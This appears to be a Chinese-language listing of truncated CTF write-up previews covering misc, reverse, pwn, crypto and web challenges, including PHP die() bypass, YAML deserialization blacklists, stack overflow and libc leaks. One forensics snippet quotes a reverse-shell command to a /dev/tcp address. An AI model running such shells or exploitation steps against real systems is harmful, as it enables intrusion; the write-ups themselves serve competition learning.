turn 出网打法 有个文件上传接口,可以在线解压。 yaml反序列化,固定反序列化/opt/resources下的文件。 黑名单: {"ScriptEngineManager", "URLClassLoader", "!!", "ClassLoader", "AnnotationConfigApplicationContext", "FileSystemXmlApplicationConte
Misc Welcome 欢迎参加竞赛,这是你的 flag:flag{84c4b350-acba-11ef-b9e0-8f6a9a54e088} flag 直接送 黑神话:悟空 png 改宽高,PuzzleSolver秒了 数据库 010 打开,发现里面全是 base64 内容,直接搜索 ZhxhZ(flag{base64 值),解密得到 flag 勒索演练 集团为了提高员工安全意识,决定
场景2 弱密码登录 开始是一个jumpserver后台登录尝试弱密码admin/admin123进入 注意不要爆破不然会被禁止30分钟 后门账户 在用户管理页面找到管理用户,发现有两个其中一个是后门账户 黑客后门程序 查看进程和对应端口 ps -aux 找到进程执行反弹shell命令 bash -c bash -i >& /dev/tcp/181.32.44.99/9898
babyre 32位无壳 能明显的看出来有tea特征,在上方可以看出是将flag分了两段分别加密 开启动态调试分析 sub_801100函数是一个伪反调试,无需理会 sub_801130则将flag前半段用十六进制存储,并且表示为小端序 调到这里发现了smc反调试,在调试过程中会改变代码,key相继经过加密,得到了新的key 第二段加密是一个类凯撒,小端序的一个每四字节倒转 改一下库存t
fillllll_put 这个题主要考察死亡die 网上有很多种方法可以绕过,这里用的是rot13 <?php die();经过 rot13 编码会变成 <?cuc qrv(); ?>,如果 php 未开启短标签,则不会认识这段代码,也就不会执行。所以就可以绕过了 <?php highlight_file(__FILE__); $filename=$_GET['filena
RHG-WP rhg3 设计的知识点:栈上的单字节溢出/劫持放回地址 ssize_t sub_946() { char buf[104]; // [esp+0h] [ebp-68h] BYREF puts("this is no gift"); puts("please input what you want say"); return read(0, buf, 0x6Du);
in 题目逻辑非常简单 同时题目保护全开,一眼看到有个任意地址写3字节,所以第一个思路是先leak出libcbase.没有任何输出函数,显然这里需要打stdout来泄露,而且发现下面两处read意图很明显,显然是先修改magic为0xfbad1887,然后再让base低字节为\x00,这样就可以泄露出libcbase 后面一个任意地址写3字节,看到main最后有个exit,显然是要打
ez_Eulers_theorem from Crypto.Util.number import getStrongPrime, bytes_to_long from gmpy2 import powmod flag=b'flag{uaioijdioaiodjwioiajdi}' p = getStrongPrime(512) q = getStrongPrime(512) r = getStr
2024古剑山 pwn 详解 in 解题思路 sla(b"Size:\n",str(0x5e6611)) sla(b"Size:\n",str(0x220000)) 首先申请size超过0x400000的chunk,然后记录size4,然后申请一个超过topchunk的堆块,2.23下申请超过topchunk的堆块会开辟一段空间 然后这两个索引配合,就可以找到stdout结构体 然后直接申请
un 打开题目环境 观察url的参数,猜测可以存在文件读取漏洞 尝试读取index.php 读取成功 <?php error_reporting(0); class pop { public $aaa; public static $bbb = false; public function __wakeup() { // PHP 5
C_or_CPP 题目中的漏洞比较明显 第一个是case2中的函数中printf("C String: %s\n", buf);这里可以带出libcbase 第二个是case5中的函数,使用 cin 输入了字符串,再将它 memcpy 到 dest 字符串中,而 dest 是存放在栈上的,因此存在栈溢出 from pwnlib.util.packing import u64 from pw
第七届浙江省大学生网络与信息安全竞赛决赛 Misc方向全解 FinalSign 给了一个txt,全选可以很明显看到存在空白字符 考虑SNOW隐写(snow特征,有大量的20,09) SNOW.EXE -C FinalSign.txt 得到xorkey:helloworld,那么很明显2c243f2f3b3114345d0a0909333f06100143023b2c55020912就是密文
网鼎杯玄武 crypto 0:解析变形的 Shamir 密钥分享机制 题目概述 本题围绕一个基于 Shamir 密钥分享的加密方案展开,涉及自定义的ShamirSS类和ShamirProtocol类。通过特定的input_share方法将flag分割成大量份额并保存为.sobj文件,其中n_players与flag长度相关,threshold设置为len(flag) * 2,模数p为 257,份额
网鼎杯-青龙组 crypto1 题目 # coding: utf-8 #!/usr/bin/env python2 import gmpy2 import random import binascii from hashlib import sha256 from sympy import nextprime from Crypto.Cipher import AES from Crypto.U
ez_redis 考了个 Redis 命令执⾏以及其历史漏洞 在这里其实给出了示例,结合题目不难发现就是个 Redis 语法 如果你有信息收集意识的话还会发现有源码泄露,访问 /www.zip 即可 关键点在: php <?php if(isset($_POST['eval'])){ $cmd = $_POST['eval']; if(preg_match("/set|p